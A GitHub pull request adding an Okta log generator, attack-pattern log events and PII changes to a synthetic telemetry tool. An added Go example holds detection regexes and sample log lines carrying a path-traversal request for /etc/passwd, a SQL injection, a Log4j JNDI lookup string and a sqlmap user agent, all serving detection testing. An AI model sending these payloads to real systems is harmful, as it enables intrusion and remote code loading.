
feat: Add Okta generator, security log patterns, and PII improvements#70

Merged
joe-armstrong merged 7 commits into main from joearmstrong/ai-253-k8s-run-telemetry-generator-security
Feb 13, 2026

Conversation


@joe-armstrong joe-armstrong commented Feb 12, 2026

Proposed Change

This PR adds a few things after using Blitz some more for testing:

New Okta System Log Generator

Added a full Okta generator (generator/okta/) that produces realistic Okta System Log events — authentication (login, SSO, MFA), security threats (brute force, credential stuffing, impossible travel), user lifecycle, password ops, app/group membership, policy changes, and admin actions. Follows the same worker/rate/backoff pattern as the other generators. Includes tests and docs.

Security-Focused Log Patterns

The Apache, NGINX, Kubernetes, and PostgreSQL generators now include security event patterns mixed into their output (~20% of web server requests are attack patterns). This gives us realistic data for testing security detection rules:

  • Apache/NGINX: Directory traversal, SQL injection, XSS, command injection, SSRF, Log4j/JNDI, scanner reconnaissance, auth bypass attempts
  • PostgreSQL: Auth brute force, SQL injection, privilege escalation, data exfiltration, suspicious admin actions
  • Kubernetes: RBAC violations, pod security policy failures, container escape attempts, network policy violations, secret access, cryptomining detection

The attack paths for Apache and NGINX are shared via internal/generator/security/paths.go to avoid duplication.

PII Generator Improvements

  • Each PII log now includes a random selection of 1-5 PII fields instead of dumping all 37 every time — more realistic
  • Restored secret_ as an API key prefix for better PII detection testing

Docker Compose Cleanup

Consolidated back to a single docker-compose.telemetry-generator.yml with all generators. Removed the split pipeline configs that were from internal testing. All generators default to 1 worker. Updated README with vendor-agnostic OpAMP examples.

Checklist
  • Changes are tested
  • CI has passed
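
The security-pattern mix described above invites a check from the detection side. The following is an added example, not code from the project: it classifies constructed Apache combined-log lines against illustrative signatures for the attack families listed for the Apache/NGINX generators, and computes the attack ratio a consumer could compare against the stated ~20% mix. The signature regexes, sample lines and function names are assumptions made for this example.

```go
package main

import "regexp"

// Illustrative signatures for the attack families the PR mixes into Apache/NGINX
// output; these are added here and are not the project's own paths.go list.
var signatures = []struct {
	Category string
	Pattern  *regexp.Regexp
}{
	{"directory_traversal", regexp.MustCompile(`(?i)(\.\./|%2e%2e(/|%2f))`)},
	{"sql_injection", regexp.MustCompile(`(?i)(union(\s|\+|%20)+select|(%27|')(\s|\+|%20)*or(\s|\+|%20)+1(=|%3d)1)`)},
	{"xss", regexp.MustCompile(`(?i)(<script|%3cscript)`)},
	{"log4j_jndi", regexp.MustCompile(`(?i)\$\{jndi:`)},
	{"scanner_recon", regexp.MustCompile(`(?i)(sqlmap|nikto|masscan)`)},
}

// Classify returns the categories an access-log line matches; nil means benign.
func Classify(line string) []string {
	var hits []string
	for _, s := range signatures {
		if s.Pattern.MatchString(line) {
			hits = append(hits, s.Category)
		}
	}
	return hits
}

// AttackRatio is the fraction of lines matching at least one signature, which is
// how a consumer can check a generator's mix against the intended ~20% (NaN on empty input).
func AttackRatio(lines []string) float64 {
	n := 0
	for _, l := range lines {
		if len(Classify(l)) > 0 {
			n++
		}
	}
	return float64(n) / float64(len(lines))
}

// SampleLog is constructed combined-log-format input, not output from the generator.
var SampleLog = []string{
	`203.0.113.5 - - [12/Feb/2026:12:58:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"`,
	`203.0.113.6 - - [12/Feb/2026:12:58:01 +0000] "GET /img/../../../etc/passwd HTTP/1.1" 404 196 "-" "curl/8.0"`,
	`203.0.113.7 - - [12/Feb/2026:12:58:02 +0000] "GET /search?q=%27%20OR%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`203.0.113.8 - - [12/Feb/2026:12:58:03 +0000] "POST /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"`,
	`203.0.113.9 - - [12/Feb/2026:12:58:04 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "sqlmap/1.7"`,
	`203.0.113.10 - - [12/Feb/2026:12:58:05 +0000] "GET /api/health HTTP/1.1" 200 15 "-" "kube-probe/1.29"`,
}
```

Running `AttackRatio` over a larger generator sample is a quick way to confirm the documented mix before relying on it for detection-rule tests.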

@joe-armstrong joe-armstrong changed the title from "feature: Add additional PII, Security & Okta log types" to "feat: Add Okta generator, security log patterns, and PII improvements" Feb 12, 2026
joe-armstrong and others added 2 commits February 12, 2026 12:58
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Restore original Bindplane references in docker-compose and README
to keep the diff focused on actual feature additions (Okta generator,
collector volume, PII worker defaults, security descriptions).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@joe-armstrong joe-armstrong marked this pull request as ready for review February 12, 2026 20:26
@joe-armstrong joe-armstrong requested a review from a team as a code owner February 12, 2026 20:26
@joe-armstrong
Contributor Author

@iris cr

@jsirianni jsirianni self-assigned this Feb 12, 2026
@joe-armstrong joe-armstrong added this pull request to the merge queue Feb 13, 2026
Merged via the queue into main with commit 030d5d1 Feb 13, 2026
16 checks passed
@joe-armstrong joe-armstrong deleted the joearmstrong/ai-253-k8s-run-telemetry-generator-security branch February 13, 2026 13:23